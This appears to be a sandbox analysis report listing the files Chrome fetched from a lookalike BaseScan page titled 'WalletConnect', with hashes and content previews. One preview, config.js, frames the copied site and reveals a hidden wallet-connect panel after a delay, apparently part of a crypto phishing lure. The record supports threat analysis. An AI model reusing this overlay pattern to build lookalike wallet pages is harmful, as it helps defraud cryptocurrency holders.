                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):24957
                                                                                                                                                                                                                                              Entropy (8bit):7.9648965660328965
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:RVL1+wKVedWEhf66NaaAcmImlDdoRsefKJtLzkH5oPcMDIx3XNH1q2mL3:RvtWOdF0jles2utLy5oPlI5XNH1qJ
                                                                                                                                                                                                                                              MD5:6F5D7ABDF59252338C3C09DA43AEF6D0
                                                                                                                                                                                                                                              SHA1:5E5BAA5DFA6B7F2D9806672D0FC0330A9B944F36
                                                                                                                                                                                                                                              SHA-256:31A7A6A985C0BDD32979DD194D787D0E0FB7D613099CF2E69EAB60F368B0898C
                                                                                                                                                                                                                                              SHA-512:9C1FFF7465E922ECAB7F94EE658F656785601BB1D498A46104527DCA0B44B8A4E9B026E7D7CFD95A35151B713C01764E6C117328300FDF2E2CED8BA4B5826459
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............9.....sRGB.........PLTE......."8#....5...&.......)../...$.."....*.&G...$.......2..-.....1......2.....'..*..7!.....#C..., ....L0.:%.......j{.F,.(..A(.bu.N`z..+..:.)@%2L...7Hc%..[m.=Nh -F...p....)Tf.......`P..$B<A.->X..()7R.o.."AJ.1C^.J-+%..*....S6.67.Va.BSm31.eU.vy.8*'......6>..x...bgo._IZvNS`....Q4*...t.........kpz....j......u.....FQ....~..XJ.......Rh....|\f\....]h.0&.........-/....|F,.|Z.d...V9..~...........5...K;.EVr.h.o8,.X]i.../2A...cb..........7@RPW.BHW@'....DA.D1..pQ.cGa.,%(9<Ey\.5&.......uT9H...3...IF....kR.^|....uSXs.._C...-,3kb.....}n....?.jN...d...cDQJ.08..kJz..>54>6......s...v.Y<...GX.er....1..WB...g=.A..aF.q>%.U<......d/..z_...^URj.....0a.PIFpz...3....|u..'T!.zoi....=...<nc]..v..'.3.z...j]~p.^@..{-.....M....6........`.R;....xnE..`........p.1...B.... .IDATx^...\S...C..=$W..B...H..*.:.BDLCH(R.@).d*.D..B...eR.(.b..C..T. .(.G...Xq....z.}o.........}?.Z;...z...d....y.....T*...c2x4...E,...b1.&..\\\....X..h4.D,.%4.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 20x20, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):496
                                                                                                                                                                                                                                              Entropy (8bit):6.011057667291563
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:dv9AaVHvGjfT11Tqap/+jJJeiryO9dDtmBlCMyyrejtvnlhMGxySYoUZ1ZlT7RyA:16atejr1tBI392Ijn0SYoUZjytdea8n
                                                                                                                                                                                                                                              MD5:D86C461BD6EFB2E45FBA28E75A77068B
                                                                                                                                                                                                                                              SHA1:94D2FFFDC5718ABB6F01A1AC2E9AADE35EC541E0
                                                                                                                                                                                                                                              SHA-256:CBB2B8EF2489E055EC65EFD6B5BFD6DF043CC97FF71DFFE702D3BF86DAC3EEBC
                                                                                                                                                                                                                                              SHA-512:B89D736936FBCEA6E4B51639D8F833432708F9D50107C33D54BB890BBC05E09964A04F02F042866BED0F4E3B4A73DE53452B0AC97C9E3C87DEA7BBFD41252850
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C............................................................................".....................................'.............................1..!"#Ab...................................................Q............?....._...ic..x.1...n|;........}..W....q...2Q#.....-..5j.d.k..."....bJJ..Nm......C-xS..v.Y..WO_....w.XR..1.o..C.....0O...n.|....4.s.*k.A....m.q`...]*QZ..(p.2.7...6\..B.JS0.)@...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):744
                                                                                                                                                                                                                                              Entropy (8bit):4.9286079116522945
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:if0PSDRRD0PnODRRmITx28DRRLFgI0fCRPwShFV51DRRfiPz+3ugWZseTopbBnUl:icPaRRYPnWRRmSx2gRRLFgII0oShFFRG
                                                                                                                                                                                                                                              MD5:3251C02C63D2AA8D2FC244C22BA90BAC
                                                                                                                                                                                                                                              SHA1:8FBE7CBDD23A12E6B4E154ED9423DD2100049203
                                                                                                                                                                                                                                              SHA-256:6B5B56BDCFDEAE7611B597C6ECA160763AEDB2F2B52A67A76D72617658AD6DBC
                                                                                                                                                                                                                                              SHA-512:AA8072148A5EA389184CECF7B28A0D770E322B4742A8A80219352892A8FCD0DBF6DB7146384AEC242D790B8729032596EFD75741126E9AB79731D016A3847888
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/config.js
                                                                                                                                                                                                                                              Preview:const websiteUrl = "/dist/website.html";..const overlay = document.getElementById("overlay");..const overlayButton = document.getElementById("overlayButton");..const websiteFrame = document.getElementById("websiteFrame");....websiteFrame.addEventListener("load", () => {.. overlay.classList.add("active");..});....websiteFrame.src = websiteUrl;....// Get a reference to the hidden div..const hiddenDiv = document.getElementById("walletconnect-wrapper");....// Function to show the hidden div..function showHiddenDiv() {.. hiddenDiv.style.visibility = "visible"; // Change to 'flex', 'grid', etc. if needed..}....// Call the function after a certain delay..setTimeout(showHiddenDiv, 3000); // Change 3000 to the desired delay in milliseconds..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/images/svg/brands/coinbase.svg
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):140
                                                                                                                                                                                                                                              Entropy (8bit):4.715736115284368
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:PouV7uJzhquHbtt6vYk2ZRMRJfHKERSAEtvxLrXZiLKY8KEs8K6c4NGL:hxuJzhqIzyYk+qRU4zEdxXZiqftK34QL
                                                                                                                                                                                                                                              MD5:8A4DD215BFC6040663744F92ECEAB57F
                                                                                                                                                                                                                                              SHA1:3A1A8A2582BF76664A352A47C7BE64AD820BDB6A
                                                                                                                                                                                                                                              SHA-256:50153B5C08C80ECF68F9CF092D5DF6D89ACD9C4B22183C71CACC9FBAD53866AA
                                                                                                                                                                                                                                              SHA-512:EA70991B7FC8E5F824B7EB45B3A760F75D5B7FED8E03523F210DCE6D42361143C51858C65A91B023BCA3EEE75AABD29444ACEC5570581200582AD5842AA26627
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="utf-8">.<title>Error</title>.</head>.<body>.<pre>Cannot GET /a</pre>.</body>.</html>.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (890)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):891
                                                                                                                                                                                                                                              Entropy (8bit):5.199036499124419
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:jXqmOloVEnLH/IoP/IISgAjElm6lZUvwnKM+zNNMk+NNMku8AwkAw3Aw+BAChMzX:iaVEDfPWAtv9nuRRqRywJwwwH/X
                                                                                                                                                                                                                                              MD5:E4B5AE56B9CE83D0804A4001E8E3FAED
                                                                                                                                                                                                                                              SHA1:1ACEA078CBA5C74FDFB0444821D84DE320FAC445
                                                                                                                                                                                                                                              SHA-256:7DF583FD67B7507222A0429715FC8533E46C96C8AC4ED8F7F19609CA569BF557
                                                                                                                                                                                                                                              SHA-512:E49E266148BB5FD745E240D1FB5D02513F6F948A729309E4E854EE6A4A1C6B37CF40B0C67F3A7F374753992B58DF2341E7DEAF496C09906A1161A29B101076F9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/vip-413478bd.js
                                                                                                                                                                                                                                              Preview:import{N as n,h as o}from"./manifest-51a3674f.js";var c=(e=>(e[e.SpinNotificationBlocked=0]="SpinNotificationBlocked",e[e.QuestBonusNotificationBlocked=1]="QuestBonusNotificationBlocked",e[e.Recharge=2]="Recharge",e[e.WeeklyBonus=3]="WeeklyBonus",e[e.MonthlyBonus=4]="MonthlyBonus",e[e.SportWeeklyBonus=5]="SportWeeklyBonus",e))(c||{});class u{constructor(){this.getLevelDesc=l=>n.getLevelInfo(l)}level(l){return n.getUserLevelInfo(l)}featureGating(){return[{feature:0,unlocked:o.vipLevel>=50,unlockedVIPLevel:50},{feature:1,unlocked:o.vipLevel>=50,unlockedVIPLevel:50},{feature:2,unlocked:o.vipLevel>=22,unlockedVIPLevel:22},{feature:3,unlocked:o.vipLevel>=22,unlockedVIPLevel:22},{feature:4,unlocked:o.vipLevel>=22,unlockedVIPLevel:22},{feature:5,unlocked:o.vipLevel>=22,unlockedVIPLevel:22}]}features(l){return this.featureGating().find(t=>t.feature===l)}}const v=new u;export{c as V,v};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65469), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1345891
                                                                                                                                                                                                                                              Entropy (8bit):5.661086821288935
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:saLh8lk8k17/ams0MRV4gIynFQfn/e2Fg:sjk8k17/JMRegIyFwDS
                                                                                                                                                                                                                                              MD5:BC9D6860CB9632A3AE39ADAE49BD7F89
                                                                                                                                                                                                                                              SHA1:4CA0DC8DE4CF3FCC23BB7093C61307EFA11EB0E4
                                                                                                                                                                                                                                              SHA-256:0C7D051AB66A0DDD1A93FC0AAA410AFA2FAF131FB6C1ED7E6BF24E4124496863
                                                                                                                                                                                                                                              SHA-512:46FDEE4A3A0577CEC7C531D9795FE0744CC95F44D75B24D8C402BD2C6E362F43931D068424AF678DB6F56FD15D789440FEBA0136EDDB873F265B0A1BC02D7E78
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/custom/web3.min.js?v=0.5.2.2
                                                                                                                                                                                                                                              Preview:/*! For license information please see web3.min.js.LICENSE.txt */..!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Web3=t():e.Web3=t()}(self,(()=>(()=>{var e={81645:(e,t,r)=>{"use strict";var n=function(e){var t="function"==typeof Symbol&&Symbol.iterator,r=t&&e[t],n=0;if(r)return r.call(e);if(e&&"number"==typeof e.length)return{next:function(){return e&&n>=e.length&&(e=void 0),{value:e&&e[n++],done:!e}}};throw new TypeError(t?"Object is not iterable.":"Symbol.iterator is not defined.")},i=function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0}),t.chains=t._getInitializedChains=void 0;var o=i(r(87295)),a=i(r(31227)),s=i(r(40439)),u=i(r(37098)),f=i(r(17687));function c(e){var t,r,i={1:"mainnet",3:"ropsten",4:"rinkeby",42:"kovan",5:"goerli"},c={mainnet:o.default,ropsten:a.default,rinkeby:s.default,kovan:u.default,goerli:f.default
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (592), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):592
                                                                                                                                                                                                                                              Entropy (8bit):4.535453757915552
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:UekvFrWX0s0s0s0s0s0s0s0s1PAQtm6SfVVVVVVVVmn:UekcAQw6Sun
                                                                                                                                                                                                                                              MD5:64881C17053A76FF4F578FCADB857EAA
                                                                                                                                                                                                                                              SHA1:071B0AAC66D1DF50BD1CAB781F9313CFF3F81174
                                                                                                                                                                                                                                              SHA-256:2F23D6B1FCF5199EC16586E3EA0366409E8B6DB66825E54DF6A2A3CE9C4B9470
                                                                                                                                                                                                                                              SHA-512:6270A9E56DFB5E289F1EB3250BAA7675263B93AD8A6CBE97D611243EA67326AF04EA50B8466540158081E603DBD14287C694B3E9EA429DF72DFB9E7B716D7FBD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISsQEJeELg3TSMKBYSBQ0aaYzfEgUNPR9TPBIFDVqx1xASBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDTHlL_4SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SFwlliF59AADj3BIFDRppjN8SBQ09H1M8EhAJQQnSEmcErloSBQ1asdcQElYJWgTXv1i4Y2QSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBJPCeOnJjUFUj4tEgUNMeUv_hIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_w==?alt=proto
                                                                                                                                                                                                                                              Preview:CtgBCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAApjCgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):312388
                                                                                                                                                                                                                                              Entropy (8bit):5.606895277552725
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:E4XApmFU7Ali04d7z3KsOemveqNeX0fxnPo:tX5W7A4nhDUA
                                                                                                                                                                                                                                              MD5:C1057823A9D944FC8A1B5BC7E11AF47D
                                                                                                                                                                                                                                              SHA1:751A06FFB71E5DA10D2AF8F9DAF1C0A5C37433E8
                                                                                                                                                                                                                                              SHA-256:0EA61FB7CCFA79F010243F2CCAFA91296DA26BAAADAAFB0056CC4FF2511CF12B
                                                                                                                                                                                                                                              SHA-512:B01DC5F1BA3FA441776465A3802ED36208A354E4455DC9F2EB00B4252E4C9F57313E01675091307468CDC67FE4B020AE5F37B70B8B94E35AD124B80372E2A87F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=G-B23BPN2TGE&l=dataLayer&cx=c
                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":23,"vtp_rules":["list","bc\\.co","hash\\.game","bc\\.app","bc\\.fun","stake\\.game","blaze\\.game","bcga\\.me"],"tag_id":9},{"function":"__ogt_dma","priority":13,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":11},{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":""
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):5520
                                                                                                                                                                                                                                              Entropy (8bit):7.949534472148274
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:iZS8xQy0FcXE5k831dQ4XBxmtbXhDXJglvciTTnEy5dHLUZ7sZ7ygajq:iZHQy0FoEi26kBxmxYvcETEQdrUpsZ7b
                                                                                                                                                                                                                                              MD5:B05FB58EA705FBC97F1B83907F8B72EA
                                                                                                                                                                                                                                              SHA1:B1AEEC68F814F631554D076B675A8A292729FC2B
                                                                                                                                                                                                                                              SHA-256:8501B051D7B9D0419643DCCF83F648162198CB72CAD11B91FB3881692A5F5C38
                                                                                                                                                                                                                                              SHA-512:F7C3F317F2F7C88DF48B0FCD6122F0B11C14F04C59E6BABED0A33AAB7D4B303B60BC036530B705E82AF7B0BB989BB243926EB7C7162CB1FBBC748501E7992B77
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/SOL.black.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L|.../c.....m..N.h..?89"........oH"**D.....S....B....;.....(..3..........$....K.A.3.8.d.jZQ...>....u.H..$)RZp..$.....-...s.....0c.TV..E.uk......s...9.8'S.......~. .-.k...\...(..lv....46'..E)..{'.N..r....m..?..sw."b../.. EN..]JE[(....?E...k]L.".q..133333..1..c...Y..Mg..._..nn.J-m...N.4.KK.Df.5.2.g;.\/`.h...#....;\..T..a..t#.<...m......._lE.l.R..m.e.+...3.[.k's..$./.C+.D...3r.#.`.-.`..h.m.m.mw.m.m.f..:../.....23.v.....Bf.(..8....l........LY]..a)v.TR..9d.~.@...K....&k..#..T.c.g.....ah....u..m5..'...jw..k......}.,.`...n..#IR$)<.4:.^h...C.......K..z6:.h.N=.R*.dbG.."YW.+.....O....[......F...]y.....}~...}...;.oh..L*.R..R....e..feF.1.je..V.Sl?.....G9.?d|..w./..*..._......%,A......`(89.`.4...c}b.c^..y?.|.V/..V....j..|pB1.Aj...9...4.....p7:...}a.._.:]..:......ND.P......9K.."...Y....*1....?.vz...u../....fa...f..4.......\......6F.i...T|.....Y|{..d...E...89...d..>U..8....i......S..^{.....,.xJ..8... ....2j3....^h.(.:*.6$......9U...p..GEN...k.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1052
                                                                                                                                                                                                                                              Entropy (8bit):7.714341547107647
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:kOrvHkNqRIxQC9MtHKTo0EJOEvNmz0Y5eXss9WV5IM5EZPhKt0a6:prvkWIxteNKTATmzgX58V52pKt0P
                                                                                                                                                                                                                                              MD5:4E251ACE881BECE31D659F1E5F77969D
                                                                                                                                                                                                                                              SHA1:D8D479A641B03FACF0FFD6F4567B397CD54F3788
                                                                                                                                                                                                                                              SHA-256:98FC4277A74FEFC7C3147768787415891B29C16F2F11B8913DE58E85A8CA1D77
                                                                                                                                                                                                                                              SHA-512:794E030BA9BF50C6016B1E1727CB50F4A69367DEEE272E8C8BC5D8F6A78C099657FDD3746BA8C05987D1CBC47CB282BC8B6F84DACE472FB98A5D9F24C359F262
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/getWalletImage/45f2f08e-fc0c-4d62-3e63-404e72170500
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8 ....0<...*....>I$.E..!...(....q.BW..~>k./.....n......,.Yk3......._..~.{(~..h..^.C.9;..I....NN.RrwD:...!.......u''tC.9;..x.X0`&....4..J.I.E?-S...n........<..GU\/v!o:.....M.......^W*.p......C.9.#...u...tT....Ad.\.02..i.....p...8l.0.J.c....,..ns..e.[....b.g.a#.9;....S..RrwD9..!o......u..C....I....G..c........T..5....x.i.1a..l....y...X.b.a..........xs14C.!^...v....=R..p....S.......f..9...9.JwD,t47J~_.<]bu..m.!~..0`..}..,..Rry#..T..b.I....NN.RrwD:...!.......u''s...................Rj....zn./..y...HN.Sx....Mc.~.......c&.)..........F..Ky....1......J*.?..{=.*..........b.~...P....$i=...D...0...;... ..O.....z..%.....dV..RN..{Ibl....r..Ci..;..?....0.L~P.T,6R......?,E./...<...)&....'..2~...-.......p.76..........hK.>.p....L.7.....L-7.. .....J.n..~4R...#..'o.P..2h.r,........Ny.\...>....:.~....~....._.Q....]Y.K.K.e>$.I.,...k.9.SD..3.. #.$..b. 7.R..-H...;..U..<..Z..a.v..'....!...Es.8.5...[.^,......~.g.8{.;....)?O.Xj....Y0.P....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65
                                                                                                                                                                                                                                              Entropy (8bit):4.493381997870699
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:TMQMfXA2HNOOVAoRqPAGPifFEgwn:ARfpVAM0AHNwn
                                                                                                                                                                                                                                              MD5:1B900AABE1EAAD963A6C2453140991C3
                                                                                                                                                                                                                                              SHA1:8D91B82DD07556187B75A0C72105D2C87D46E28C
                                                                                                                                                                                                                                              SHA-256:142D88EDCFCEBF2AAB353BA887C17C050AE9A9E2882142BC8EEC793F53868B73
                                                                                                                                                                                                                                              SHA-512:9B719F692DAE0219301826B112F5CCC9C34319695040DD3BB89DBAB88238A53892AA42E90427CF7F7B145AE6FFA31013F0B303D8AFB1EEAEB0792C8CE0EE969D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:function e(t){return t!=null&&typeof t=="object"}export{e as i};.
